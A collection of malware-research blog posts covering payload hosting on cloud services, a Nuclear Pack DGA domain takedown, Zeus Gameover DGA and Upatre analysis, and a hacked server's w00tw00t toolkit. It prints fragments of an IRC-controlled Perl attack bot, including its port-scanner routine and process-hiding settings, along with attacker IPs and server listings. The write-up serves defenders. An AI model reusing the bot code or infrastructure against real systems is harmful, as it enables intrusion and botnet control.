1. amazonaws.com (property of Amazon AWS) is utilised by this actor for another bad purpose (see the mobile link and the Opera browser link in the explanation above; whatever it is, it is not a good thing). We had better warn Amazon AWS about this link.
2. dropboxusercontent.com (property of Dropbox, Inc.) is also utilised to serve the malware payload.
3. See the domain in the payload URL, googlecode.com: this is abuse of Google Code's SVN facility.
4. Last, the goo.gl service, the Google URL shortener, is also abused to hide the URL of the malware payload.
Google Code has been abused to serve malware payloads of this threat's series for quite a while; you can view the reports posted by our friend @sarimura (Twitter) to the Project Hosting on Google Code group in Google Groups-->[here]. It shows how persistent the malware actor is in always creating a new Google project and using its download URL to serve the malware payloads. On the other hand it shows that the bad actor(s) leave many traces on Google Code servers when uploading the payloads (account ID, IP addresses, etc.).. a hint to follow, isn't it?
Sample
I share all samples, under the usual password; click the picture below to download:
Moral of the story: our beloved internet and its services are badly abused by malware. Stay safe please! PS: Comments and additions will be added in the follow-up section! It looks like this threat is bigger than expected, so I couldn't sleep again, and gotta go to day work now!
Follow Up
Please help suspend user "buexe-x" of GoogleCode, he is spreading malware via SVN - Attached=download log > @Google pic.twitter.com/FT8cXTFFkg
This post is a tribute to the hard-working individuals and professionals who made the impossible happen.
The Report
This is one result of a persistent collaboration between security researchers and the domain registration process, following the previous suspension effort of Nuclear Pack Exploit Kit domains (link). On behalf of the individuals & professionals involved in the process, we dare to announce the suspension of 209,306 Nuclear Pack domains on the TLD ".IN.NET". It is the biggest Tango Down score in the history of MalwareMustDie.
For security purposes we cannot say much about the details of this matter yet, except that all of the domains are positively "verdicted" for their involvement in the DGA scheme of the malicious infection toolkit, and that the suspicious facts found in the preliminary registration investigation were positively confirmed beforehand. The bad actor(s) were preparing these domains to serve malware; the usage of these domains is blocked, and the currently spotted active domains are all suspended.
We announce the tango news here to signal law enforcement and the authorities to start investigating the listed suspended domains, which contain data that can be used as cyber crime evidence of the malware infection effort through software exploitation by mass abuse of .IN.NET internet domains.
The full list of the DGA domains used and the checking report are very long, so we cannot paste them all here in the post or in pastes (yet), but this is the link to the extracted DGA domains -->[here] < Thank you @jedisct1 and Gist!
Good Work Credit
Special thanks for the great cooperation from the DOMAINS.IN.NET Team, what speedy and solid work! It is a very long list but you checked it instantly, followed by the swift suspension. Special credit goes to our friend Mr. Frank Denis of OpenDNS for the DGA decoding and its report, our Tango Department led by Mr. Sachin Raste of eScan, side by side with Mr. Conrad Longmore, Mr. Dhia Mahjoub of OpenDNS and other managers from various entities whom we cannot all mention here, who are silently fighting this threat in a tough daily routine. Salud!
The process does not stop here. There will be more follow-up.
This weekend, Zeus P2P Gameover (in short: GMO) is running a large campaign utilizing Upatre (using the latest version, which downloads an encrypted ZZP file under many extensions), riding on the Cutwail spambots (I checked those by IP and templates). As many good write-ups out there have stated, this recent GMO shows a new trend: it uses the Necurs rootkit, sends a new callback (with POST /write) HTTP header to the CNC, drops itself (the GMO payloads) with polymorphic hashes to evade detection, and fires tons of randomized DGA lookups for the P2P callbacks of the botnet functionality (the last one is apparently not new).
Shortly, this new "trend" with the large volume of the campaign caught my interest, so I started to collect what came into my honeypot from March 18, 2014 until today as the background of this post.
The Quick Research
Below are the pictures of the malvertisement that the crook kindly sent me personally:
There are many interesting reports about this threat, like VRT (link) and CERT Polska (link), which are very good! Since I am dead busy right now, please kindly bear with this short post; I won't write much about the technical details already covered in previous reports by others. What I want to stress here is only one aspect: the DGA callback domains used by GMO (as per the picture below), which were not covered much in previous articles, but are important to understand and learn, since the DGA used by GMO has weak points that can be used to stop or mitigate the threat and give the bad actor behind the scene a "sting" :))
What's with these "Lame" DGA?
Skipping the details of reversing the binaries for security purposes, and comparing the result in the forensics, I collected these callbacks as per the list of domains below:
These are the "Lame DGA" that GMO uses, meaning these are strings decoded from the malware binary without any seed: a wannabe DGA (Domain Generation Algorithm) that is not randomized, where the logic for extracting each string is in the GMO binary itself, for the samples I listed above. One doesn't have to be a reverser to figure out that some of these "Lame DGA" domains are used & spotted over and over in many samples. So why are so many domains made, and why do they "look" randomized in name? "Maybe" they (the GMO crooks) want us to think it is a real DGA, to avoid blocking. It is an insult to decent people's intelligence and will be a massive big #FAIL for the crooks themselves if people start to aim their cannons at this weak spot (yes, friends, aim your cannon there, THERE!).
What? Blocking? Is it blockable? Not a decoy or something? Are these really activated? < The general answer to all of these is "YES!", and they could also be decoys (if they are not going to activate those domains anyway). Great, isn't it? :D
Activation, IP Information & Getting Closer to CNC??
As the PoC: now (TODAY, to be precise) I found that four of the domains above are actually activated and ALIVE:
With the detailed information below: yes, LINODE has a serious matter with Zeus/Gameover, because all of these IP addresses are GMO's command and control front ends :-))
These 4 (four) IP addresses, plus one newly added (I will add more), are not ISDN/pool IPs but static IPs, and two of them have Corporate status. So if you think these four IPs are peer-to-peer or infected PCs' IPs, the answer is no; please deduce the further investigation step from why GMO is collaborating with these IPs.
ADDED: Cut the crap! What is the connection of the DGA to the CNC??
I was asked many questions about what this DGA actually does. I will try to write a simple explanation as follows; sorry to my fellow researchers for burping this fact here, but "some people" are starting to think I am trying to sell "candy bars" here..
Gameover rapidly requests DNS for the active IP address of the CNC using this DGA, "WITH OR WITHOUT internet connection" (I heard noise saying that cutting the internet connection is what makes GMO query lots of domains.. which is just WRONG). Even when an internet connection exists, GMO makes the rapid calls shown in the PCAP screenshot above (re-posted below). The purpose is to confuse researchers: they aim for only one (or at most two) CNC IP address(es), which are actually registered under a "few" of the "tons" of lame DGA domains. To be clearer, take a look at the PoC below:
As the PoC, look at the latest sample's DGA; we detected the activation of the IP address below:
After receiving the IP address from the DGA request, GMO can send requests to the CNC, as per the real PoC below. This is the connection, and this is how the DGA is actually very important for Gameover's communication with the CNC: blocking these DGA domains blocks its communication to the CNC, and without a CNC connection Gameover is just "another" botnet without its master's command and control; it will keep peering with its fellows without any control from the herder < this is the connection you all asked for, this is the attack point. (Forgive me, God of InfoSec, for burping this info out in public here; there is no way I can convince others without telling this fact loud and clear..)
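To make the DNS side of the above concrete, here is an added example (written for this edit, not part of the original post or of any MalwareMustDie tool) that does what a resolver-log review would do with the "lame DGA" behaviour: it flags a host that bursts NXDOMAIN lookups, reports the few names that actually resolved (the CNC front-end candidates), and emits the whole queried set as a blocklist so the not-yet-registered names are covered before they go live. The log line format, the domain names, the client addresses and the 203.0.113.0/24 answers are all constructed for this example.

```python
"""Added example (not from the original post): triage of a resolver log for
DGA-style lookup bursts and for the few DGA names that resolve."""
from collections import defaultdict
from datetime import datetime

# Constructed resolver log: "<date> <time> <client> <qtype> <qname> <rcode> <answer>"
# (answers use the 203.0.113.0/24 documentation range; names are made up)
SAMPLE_LOG = """\
2014-03-22 10:00:01.001 10.0.0.5 A oxgqjhgdqj.biz NXDOMAIN -
2014-03-22 10:00:01.052 10.0.0.5 A lvznzhnpqsa.net NXDOMAIN -
2014-03-22 10:00:01.110 10.0.0.5 A wqtpzkkrmnhf.org NXDOMAIN -
2014-03-22 10:00:01.171 10.0.0.5 A bdfreukqhx.com NOERROR 203.0.113.7
2014-03-22 10:00:01.230 10.0.0.5 A pqowieurytla.biz NXDOMAIN -
2014-03-22 10:00:01.290 10.0.0.5 A zmxncbvalskd.net NXDOMAIN -
2014-03-22 10:00:01.340 10.0.0.5 A qazwsxedcrfv.org NOERROR 203.0.113.7
2014-03-22 10:00:01.402 10.0.0.5 A tgbyhnujmikol.com NXDOMAIN -
2014-03-22 10:00:05.000 10.0.0.9 A www.example.com NOERROR 203.0.113.80
2014-03-22 10:00:06.000 10.0.0.9 A mail.example.com NOERROR 203.0.113.81
"""


def parse_dns_log(text):
    """Parse the constructed format above into dict records; skips malformed lines."""
    records = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 7:
            continue
        ts = datetime.strptime(parts[0] + " " + parts[1], "%Y-%m-%d %H:%M:%S.%f")
        records.append({"ts": ts, "client": parts[2], "qtype": parts[3],
                        "qname": parts[4].lower(), "rcode": parts[5],
                        "answer": None if parts[6] == "-" else parts[6]})
    return records


def find_dga_clients(records, window=10.0, nx_threshold=5):
    """Per client, the peak number of NXDOMAIN answers inside a sliding
    window of `window` seconds. Clients at or above nx_threshold are
    returned as {client: peak}; thresholds are this example's assumption."""
    by_client = defaultdict(list)
    for r in records:
        if r["qtype"] == "A" and r["rcode"] == "NXDOMAIN":
            by_client[r["client"]].append(r["ts"])
    flagged = {}
    for client, times in by_client.items():
        times.sort()
        start, peak = 0, 0
        for end in range(len(times)):
            while (times[end] - times[start]).total_seconds() > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= nx_threshold:
            flagged[client] = peak
    return flagged


def activated_domains(records, clients):
    """{domain: ip} for the names the flagged clients asked for that DID
    resolve: the registered 'few of tons' that point at the CNC front end."""
    return {r["qname"]: r["answer"] for r in records
            if r["client"] in clients and r["rcode"] == "NOERROR" and r["answer"]}


def blocklist(records, clients):
    """Every name the flagged clients queried, resolved or not, so the
    not-yet-registered ones are blocked before the actor activates them."""
    return sorted({r["qname"] for r in records if r["client"] in clients})


if __name__ == "__main__":
    recs = parse_dns_log(SAMPLE_LOG)
    flagged = find_dga_clients(recs)
    print("DGA-like clients:", flagged)
    for name, ip in sorted(activated_domains(recs, flagged).items()):
        print(f"  activated: {name} -> {ip}")
    print("blocklist:", blocklist(recs, flagged))
```

Pivoting on the answer column is the useful part: two different DGA names resolving to the same address in one burst is the pattern the post describes, and that address, not the domain names, is what to hand to the hosting provider.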
What's the point??
Below are my points, as simple as possible:
1. Get these DGA domains' registration info! These DGA domains are registered only by the bad actor; they are not hacked sites, not hacked domains. We have tons of experience now in nailing a crook's ID by this method, so please extract the information from your known registrars and pass it to law enforcement immediately.
2. A suggestion: a chance to catch them "in the act". The unregistered domains will likely be registered sooner or later after the current ones are blocked/suspended, so it is good for registrars, CERTs and law enforcement to make an extra effort: a list, or better yet, an auto-block scheme and maybe a direct alert system to law enforcement, to trap the crook's collaborating channels so they are "caught in the act" and can be legally investigated.
3. Do it NOW. The GMO coders implemented the logic of the DGA in the GMO binary, which is not easily remade without redeveloping a big part of the current malware, so we can hope this scheme lasts for a while; it is a chance for the good guys! :-))
4. Words for the "malware crooks": I really love to see the malware crooks' faces while they're reading this post :P) A few words for the malware coders from us: we are security engineers here, we reverse stuff very well, we investigate things deep, don't make us come at you now. STOP your malware coding practice and get decent work like all of us. Life, no matter what, is never easy; let's code something useful & positive even if we only receive a few pennies for it.
Mr. Conrad Longmore extracted more related DGA domains via the verdicted IP addresses above; thanks Conrad, so we don't have to crack binary per binary to get these. Please visit the Dynamoo Blog at the link below:
What we are posting here is knowledge for the awareness of the many PC users, the victims who are getting hit by this malware's infection, whose credentials were stolen into some botnet panel by GMO's affiliated gates/panels, to inform you that there are actually so many methods that can be applied and executed to stop the malware infection scheme that comes from/uses the internet. As long as the good guys are still in control of networking and the internet, the scheme to stop malware infection via malvertisement can always be applied. The only problem is always: HOW BAD do we REALLY want to stop this malware?
Following the previous blog (link) on the Zeus P2P Gameover (GMO) malware delivered by the Upatre trojan downloader in an encrypted form with varied file extension names: today I found that the threat returned to the previous model of the Upatre downloader scheme (via SSL). Just in case, I post it here; it is not new stuff, but I hope it can help some friends:
The spam sample is like this: *) The attached executable samples can be viewed at the bottom of this post.
The Upatre binary analysis
Some notes on the attached archived PE:
Compile Time: "0x533C67DB [Wed Apr 02 19:41:15 2014 UTC]"
Identified compiler: "Microsoft Visual C++ 5.0/6.0"
Entry Point at section: ".text"
CRC Fail: "Claimed 90984, Actual 77672"
Sigs: "Verified:Unsigned, Publisher: n/a"
Bad Entropy: ".text Flags: IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ Entropy: 6.336388 (Min=0.0, Max=8.0)
MD5: 28f4e63b3406fb9343aaf369f1897fb0"
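The compile timestamp and the section entropy in the notes above are easy to recompute and worth recomputing yourself, and the xor/ror comparison in sub_4015A0 shown further below is easier to read as code than as a listing. The Python below is an added example written for this edit, not code from the original post or from any tool named here: it parses TimeDateStamp from a constructed minimal PE header, computes Shannon entropy with a rule-of-thumb bucketing that is this example's own assumption, and re-implements the xor/ror/cmp/jb sequence with 32-bit unsigned semantics so that the values which take the branch can be enumerated. The candidate dwords fed to it are test inputs, not values recovered from the Upatre sample.

```python
"""Added example (not from the original post): stdlib-only helpers for the
static notes in this section (compile timestamp, section entropy) and a
readable re-implementation of the sub_4015A0 comparison."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

MASK32 = 0xFFFFFFFF


def pe_timestamp(data):
    """Return (raw, datetime_utc) of IMAGE_FILE_HEADER.TimeDateStamp.
    Layout: 'MZ' stub, e_lfanew at 0x3C, then 'PE\\0\\0' and the COFF header;
    TimeDateStamp is the dword after Machine and NumberOfSections."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    raw = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return raw, datetime.fromtimestamp(raw, tz=timezone.utc)


def shannon_entropy(buf):
    """Bits per byte: 0.0 (a single byte value) .. 8.0 (all 256 values uniform)."""
    if not buf:
        return 0.0
    n = len(buf)
    return -sum((c / n) * math.log2(c / n) for c in Counter(buf).values())


def classify_entropy(e):
    """Rule-of-thumb buckets (an assumption of this example, not a standard):
    compiled x86 code usually lands around 5.5-6.5; from ~7.2 upwards the
    bytes look compressed or encrypted, which is suspicious for a code section."""
    if e >= 7.2:
        return "packed-or-encrypted"
    if e >= 5.0:
        return "code-like"
    return "low"


def build_sample_pe(timestamp):
    """Constructed minimal MZ stub + PE signature + COFF header: enough for
    pe_timestamp(), not a loadable executable."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x014C, 1, timestamp, 0, 0, 0xE0, 0x010F)
    return bytes(dos) + b"PE\0\0" + coff


# --- the sub_4015A0 check, with x86 32-bit register semantics ---
def ror32(value, count):
    count %= 32
    value &= MASK32
    return ((value >> count) | (value << (32 - count))) & MASK32


def rol32(value, count):
    count %= 32
    value &= MASK32
    return ((value << count) | (value >> (32 - count))) & MASK32


XOR_KEY = 0xABED8791                 # xor ebx, 0ABED8791h
LIMIT = ror32(0x40000000, 0x0E)      # mov edx, 40000000h ; ror edx, 0Eh  -> 0x10000


def stage_var_3C(var_60):
    """mov eax,[ebp+var_60] ; rol eax,6 ; add eax,455E4A5h ; mov [ebp+var_3C],eax"""
    return (rol32(var_60, 6) + 0x0455E4A5) & MASK32


def passes_check(dword):
    """xor ebx,key ; cmp ebx,edx ; jb sub_401464  (jb = unsigned below).
    True when the branch is taken. Because LIMIT is 0x10000, that is exactly
    when the high 16 bits of dword equal the high 16 bits of the key (0xABED);
    the low 16 bits never matter."""
    return ((dword & MASK32) ^ XOR_KEY) < LIMIT


if __name__ == "__main__":
    raw, when = pe_timestamp(build_sample_pe(0x533C67DB))
    print(f"TimeDateStamp 0x{raw:08X} -> {when:%a %b %d %H:%M:%S %Y UTC}")
    sample_text = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10] * 40 + list(range(64)))
    e = shannon_entropy(sample_text)
    print(f"constructed .text entropy {e:.6f} -> {classify_entropy(e)}")
    print(f"LIMIT = 0x{LIMIT:X}; 0xABED1234 passes: {passes_check(0xABED1234)}")
```

Reading the check this way is what makes it useful: a 32-bit xor followed by an unsigned compare against 0x10000 is really a 16-bit marker test, so when hunting for the value that satisfies it you only need to search the high word.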
I also use our beloved PeStudio (downloaded from winitor.com) for a reliable check of the alerts:
// Note: MSVCRT.DLL is the Microsoft Visual C Run-Time Library (and MSVCPP.DLL is the standard C++ library) for Visual C++ versions 4.2 to 6.0. It provides programs compiled with these versions of Visual C++ a typical set of library functions required by C and C++ programs. These include string manipulation, memory allocation, C-style input/output calls, etc. The msvcrt.dll is now a "known DLL," meaning that it is a system component owned and built by Windows. It is intended for future use only by system-level components.
So.. combined with the system "internal calls" used, shown below.. this "software" is likely never good..
Note: I tend to call it encrypted since it needs a XOR key to decrypt it; see the following notes. Note: there is more obfuscated data in other places too (in .data, .rdata, and .rsrc); this binary is literally encrypted.
If we solve the above obfuscation (which I cannot yet) it should give the code of the method that decrypts the encrypted traffic and downloads the malware from the assigned hosts. If you don't have a disassembler you can use the raw disassembly output from the free version of IDA that I pasted here--> (link) to start the reversing process.
Another note: the "start" entry point is in the .text section; it checks the environment there (plus a few evasion tricks) and goes to wWinMain, which contains the real deal of decrypting the obfuscated data. In wWinMain I can see the interesting checking pattern below, applied after the XOR:
"deobfuscation pattern, repeated more than once.. (three times actually, with different registers used)"
[...]
push edi
pop edx
mov eax, [ebp+var_60]
rol eax, 6
add eax, 455E4A5h
mov [ebp+var_3C], eax
mov edx, 136C6E9Bh
mov [ebp+var_1C], edx
mov ecx, 7E0C0B9Ah
mov [ebp+var_68], ecx
mov eax, 668758F1h
mov [ebp+var_14], eax
mov edx, 5D1E4FCDh
mov [ebp+var_18], edx
mov ecx, 0FFFFFFFFh
mov [ebp+var_C], ecx
call sub_4015A0
[...] <=== "xor'ed and checked"
"called checks in sub_4015A0:"
push ebx
push esi
push edi
mov ebx, [ebp-80h]
xor ebx, 0ABED8791h <======
mov edx, 40000000h
ror edx, 0Eh
cmp ebx, edx // the checks.
jb sub_401464
// end stuff here...
How does it work?
This is what I saw. During execution, Upatre communicates with the host below:
kionic,com / 64,92,125,121 (Netfronts/U.S.A.)
via TLSv1 (SSL), fetching the URL of a Microsoft certificate patch and the URL of Comodo's encryption certificate:
Next, this data triggers each URL in the list to be downloaded by Upatre itself, as shown below:
Some reference for you explaining what was downloaded from the Microsoft site:
It is a patch to revoke certificates, intended to make sure the following Comodo certificate can be installed successfully:
This is the one that can be downloaded successfully:
Next.. Upatre downloads a binary blob via an encrypted communication (SSL) from kionic.com (64.92.125.121): To be more viewable:
The downloaded malware is saved and registered (autorun) in:
Not much to tell (kudos to the good people who fight this threat well!); instead it is the usual installation (the batch): it drops its rootkit, hooks itself in the registry, and after a while starts querying some DGA domains as below:
— MalwareMustDie, NPO (@MalwareMustDie) April 3, 2014
Samples, Traffic and VT
Below are the sample's snapshots: please download via Kernel Mode-->(link)
Matrix of infection stages' detection ratio (VT)
This time I would like to make a matrix of the detection ratio of the malware at the time I analyzed this sample. I used VirusTotal (VT) scores for a comprehensive result. Please note that a VT score is based on part of the signature detection used by the AntiVirus industry (not the overall filtration), so it is not an exact measurement, but it is good enough to give an idea of how this threat is detected by the AV industry in every form of sample (during the infection stages) of this infection.
The "Stages" column explains the form of the malware during the infection process as the object to be scanned by AV products. I started from stage 1 as the email data itself, then the attachment in zip, the PE, the PE self-copied after being clicked, the downloaded GMO, the self-copied GMO and the rootkit downloaded/used. Feel free to comment for improvement:
That was actually the first attack series we received, as listed here-->PASTEBIN. Having had enough, I started to investigate this matter thoroughly. With help from @malm0u53 I was led to the source of the attack, and started digging deeper over there to find stuff malicious enough to shock a good person.
This report actually contains many ways to mitigate similar attacks in the future, and also helps in understanding the source and nature of the current threat. For Firewall/IPS/IDS filtration research, maybe this poor English writing can be used as reference. I will share the samples when ready; they contain very dangerous toolkits & packages. Following is the report in detail..
Seeing the details of each IP.. to prioritize the examination:
DATE                         | IP             | REVERSE                           | ASN   | NETWORK PREFIX  | AS CODE         | cn | ISP CODE            | ISP NAME
-----------------------------|----------------|-----------------------------------|-------|-----------------|-----------------|----|---------------------|------------------------------------------------
Sun Oct 20 22:18:15 JST 2013 | 118.26.203.66  | -                                 | 23724 | 118.26.200.0/21 | CHINANET-IDC-BJ | CN | -                   | FOREST ETERNAL COMMUNICATION TECH. CO.LTD
Sun Oct 20 22:16:47 JST 2013 | 211.162.16.164 | -                                 | 4837  | 211.162.16.0/20 | CHINA169        | CN | SZGWBN.NET          | BEIJING GUOXIN BILIN TELECOM TECHNOLOGY CO. LTD
Sun Oct 20 21:23:04 JST 2013 | 58.211.18.184  | -                                 | 23650 | 58.211.16.0/21  | CHINANET-JS-AS  | CN | CHINATELECOM.COM.CN | CHINANET JIANGSU PROVINCE NETWORK
Sun Oct 20 21:23:03 JST 2013 | 197.221.26.250 | -                                 | 37153 | 197.221.0.0/18  | HETZNE          | ZA | YOUR-SERVER.CO.ZA   | HETZNER (PTY) LTD
Sun Oct 20 21:23:06 JST 2013 | 2.228.117.30   | 2-228-117-30.ip191.fastwebnet.it. | 12874 | 2.224.0.0/13    | FASTWEB         | IT | FASTWEBNET.IT       | FUTURA ENTERPRISE
Sun Oct 20 21:23:08 JST 2013 | 46.105.124.119 | poc2.polyspot.com.                | 16276 | 46.105.0.0/16   | OVH             | FR | OVH.COM             | OVH SYSTEMS
Sun Oct 20 21:23:09 JST 2013 | 212.227.251.6  | s15378439.onlinehome-server.info. | 8560  | 212.227.0.0/16  | ONEANDONE       | DE | 1AND1.CO.UK         | 1&1 INTERNET AG
Using lynx to check the validity of the HTTP status on each server...
$ lynx -head -dump http://197.221.26.250
Looking up 197.221.26.250
Making HTTP connection to 197.221.26.250
Alert!: Unable to connect to remote host.
lynx: Can't access startfile http://197.221.26.250/
While 211.162.16.164 (thanks to MalMouse for noticing this!) led us to the source of the attack. In the source: let's enlarge the point that describes the source. Well, this is the source of the attack, a hacked site; I marked the hack files in green. The site itself is full of URL redirections, so I cannot call it a clean site, but I will focus on the w00tw00t attack component only:
Connected to 37.1.192.220.
220 FTP Server ready.
Name (37.1.192.220:rik): test
331 Password required for test
Password:
230 User test logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -alF
229 Entering Extended Passive Mode (|||1460|)
150 Opening ASCII mode data connection for file list
drwxr-xr-x   18 test   admin      4096 Sep  2 20:22 /
drwxr-x--x   10 test   admin      4096 Oct 13 18:02 ./
drwxr-x--x   10 test   admin      4096 Oct 13 18:02 ../
-rw-r--r--    1 test   admin         7 Oct 12 10:51 .codepage
-rw-r--r--    1 test   admin     37287 Oct 13 15:53 .dsf
drwx------    2 test   admin      4096 Aug 24 08:25 bin-tmp/
-rw-r--r--    1 test   admin  10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--    1 test   admin     19609 Oct  1 19:11 "bot.zip"
drwxr-x--x    2 test   admin      4096 Aug  7  2012 email/
drwxr-xr-x    2 test   admin      4096 Nov 27  2012 etc/
drwxr-xr-x    4 test   admin      4096 Nov 26  2012 home/
-rw-r--r--    1 test   admin      2043 Oct  8 08:58 "logclean"
-rw-r--r--    1 test   admin       650 Oct  8 08:58 "logclean.tgz"
drwxrws---    2 apache admin    757760 Oct 20 14:16 mod-tmp/
-rw-r--r--    1 test   admin       416 Oct 12 09:17 "muhrc"
-rw-r--r--    1 test   admin     37281 Oct 13 16:34 "perl"
drwxr-x--x    2 test   admin      4096 Aug 18 11:18 php-bin/
-rw-r--r--    1 test   admin    480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--    1 test   admin        76 Oct 11 10:16 "psybnc.conf"
-rw-r--r--    1 test   admin    130892 Oct 13 18:02 "screen.tar"
-rw-r--r--    1 test   admin     96937 Oct  8 08:56 "test.txt"
lrwxrwxrwx    1 apache admin         7 Aug  7  2012 tmp -> mod-tmp/
-rw-r--r--    1 test   admin      3623 Sep 30 12:30 "unrealircd.conf"
-rw-r--r--    1 test   admin     84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--    1 test   admin  37026699 Oct  6 13:12 "vulnmare"
drwxr-x--x   11 test   admin      4096 Sep 15 13:00 www/
-rw-r--r--    1 test   admin      5323 Oct 12 14:29 "x.pl"
-rw-r--r--    1 test   admin     11934 Oct  7 19:19 "xvuln.txt"
226 Transfer complete
And yes, I grabbed them all..
Threat Components..
The files below are the list and log used for the w00tw00t attack:
-rw-r--r--    1 test   admin     84852 Oct 13 18:01 "vuln.txt"
-rw-r--r--    1 test   admin  37026699 Oct  6 13:12 "vulnmare"
-rw-r--r--    1 test   admin     11934 Oct  7 19:19 "xvuln.txt"
And the file below is the w00tw00t attack script itself:
-rw-r--r-- 1 test admin 5323 Oct 12 14:29 "x.pl"
These files are the set of hacking tools injected into this site:
-rw-r--r--    1 test   admin       650 Oct  8 08:58 "logclean.tgz"
-rw-r--r--    1 test   admin    480699 Oct 13 11:33 "pma.tgz"
-rw-r--r--    1 test   admin    130892 Oct 13 18:02 "screen.tar"
-rw-r--r--    1 test   admin     19609 Oct  1 19:11 "bot.zip"
-rw-r--r--    1 test   admin  10368191 Sep 30 20:27 "blackcat.jpg"
-rw-r--r--    1 test   admin     37281 Oct 13 16:34 "perl"
PS: blackcat.jpg is actually a GZIP:
Zipped component #0
Compression      Deflated
ExtraFlags       (none)
Flags            (none)
ModifyDate       2009:10:15 03:21:19-07:00 (4 years, 5 days, 4 hours, 31 minutes, 25 seconds ago)
OperatingSystem  Unix
File Size        9.9 MB
File Type        GZIP
MIME Type        application/x-gzip
Peeling the Code: w00tw00t Attack Script - x.pl
Written in pure Perl, the script is used to pwn web servers running vulnerable PHP, injecting and then extracting all of the "package" files onto the compromised server, and then connecting the server to the "master" via an IRC channel. Below is the breakdown of the code in the image. It uses these Perl modules:
#!/usr/bin/perl
# MODULES
#use warnings;
use Parallel::ForkManager;
use IO::Socket;
use URI::_foreign;
use URI::_generic;
use URI::_query;
require URI::_foreign;
use URI;
use LWP;
use LWP::Simple;
use LWP::UserAgent;
use LWP::Protocol::http;
use URI::http;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use HTML::Parser;
use Parallel::ForkManager;
use IO::Socket;
use LWP::Simple;
use LWP::UserAgent;
use HTTP::Cookies;
use HTTP::Request::Common qw(POST);
use HTTP::Headers;
use Getopt::Long;
use Time::HiRes qw(gettimeofday);
use MIME::Base64;
How they define the User-Agent, timeout, payload & shell:
#use strict;
my $ua = LWP::UserAgent->new(agent =>"Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]", env_proxy => 1, keep_alive => 1,timeout => 20);
my $hostfile="vuln.txt";
my $word=".dsf";
my $maximumprocess="50";
my $hiddenprocess='/usr/sbin/sshd ';
my $eth="eth0";
my $spd='7';
my $scanclassb;
my $scanclassa;
my $explhost;
my $explpayhost;
my $explpayloadfile;
This is where the exploitation & its components are defined:
The ATTACK logic of #w00tw00t used in this attack is very simple... with some error trapping, and.. they're not very friendly to their users... Here is the main exploit function; note the extraction of the PMA hacking tools to pwn the server: Finally the scan, with activation of the PMA toolkit.. and the deletion of the extracted toolkit components..
Post #w00tw00t pwned.. (1) The Evil Redirection Service
This is the main concept of the attack, explaining WHY this server has so many "weird" redirections. This server itself was pwned and became the host of an evil redirection service, as per one of the directories below:
ftp> cd bin-tmp/
250 CWD command successful
ftp> ls -alF
229 Entering Extended Passive Mode (|||49723|)
150 Opening ASCII mode data connection for file list
drwx------    2 test admin 4096 Aug 24 08:25 ./
drwxr-x--x   10 test admin 4096 Oct 13 18:02 ../
-rwx------    1 test admin 4564 Jun 15  2007 cgi.php*
-rw-------    1 test admin  198 Aug 24 08:22 sess_02b1133c97f1cfe501c49939044db715
-rw-------    1 test admin  233 Aug 24 08:23 sess_09e938787c74a1345b62c0cddb6e7ffb
-rw-------    1 test admin    0 Aug 24 08:23 sess_0ea5482947611be5265c62949367ac1c
-rw-------    1 test admin  203 Aug 24 08:24 sess_103115f99c01d5a2f99a000c17e413c2
-rw-------    1 test admin    0 Aug 24 08:23 sess_145adf08b9432c2884dd4f174ebeb7d3
[...]
If you look inside the cgi.php file itself, it is a PHPSHELL v1.7:
Post #w00tw00t pwned.. (2) The Network Attack Tool (Portscanner, DDoS, etc.)
It is no surprise anymore to find an attack tool in a case like this; it seems to be part of the package actually. Below are code snippets used for the attack (the snipped code was cut and modified, so it is "neutralized"). File:
-rw-r--r--    1 test   admin     37281 Oct 13 16:34 perl   (this is the shadow of the file below, self-copied by the main script)
-rw-r--r--    1 test   admin     37287 Oct 13 15:53 .dsf
Below are the evil code snippets, for PoC purposes:
The Port Scanner:
# Default quick scan ports
my @portas=("21","22","23","25","53","80","110","113","143","3306","4000","5900","6667","6668","6669","7000","10000","12345","31337","65501");
# Quick scan
if ($funcarg =~ /^ps (.*)/) {
    my $hostip="$1";
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312Portscanning\003\002: $1 \002\00312Ports:\003\002 default");
    my (@aberta, %porta_banner);
    foreach my $porta (@portas) {
        my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
        if ($scansock) {
            push (@aberta, $porta);
            $scansock->close;
            sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
        }
    }
    if (@aberta) {
        sendraw($IRC_cur_socket, "PRIVMSG $printl :Port Scan Complete with target: $1 ");
    } else {
        sendraw($IRC_cur_socket,"PRIVMSG $printl :\002[x]\0034 No open ports found on\002 $1");
[...]
The "Nmap"(?)
# NMAP, lol
elsif ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/) {
    my $hostname="$1";
    my $portstart = "$2";
    my $portend = "$3";
    my (@abertas, %porta_banner);
    sendraw($IRC_cur_socket, "PRIVMSG $printl :\002\00312xMap Portscanning\003\002: $1 \002\00312Ports:\003\002 $2-$3");
    foreach my $porta ($portstart..$portend) {
        my $scansock = IO::Socket::INET->new(PeerAddr => $hostname, PeerPort => $porta, Proto =>'tcp', Timeout => $portime);
        if ($scansock) {
            push (@abertas, $porta);
            $scansock->close;
            if ($xstats) {
                sendraw($IRC_cur_socket, "PRIVMSG $printl :Found: $porta"."/Open");
            }
        }
    }
    if (@abertas) {
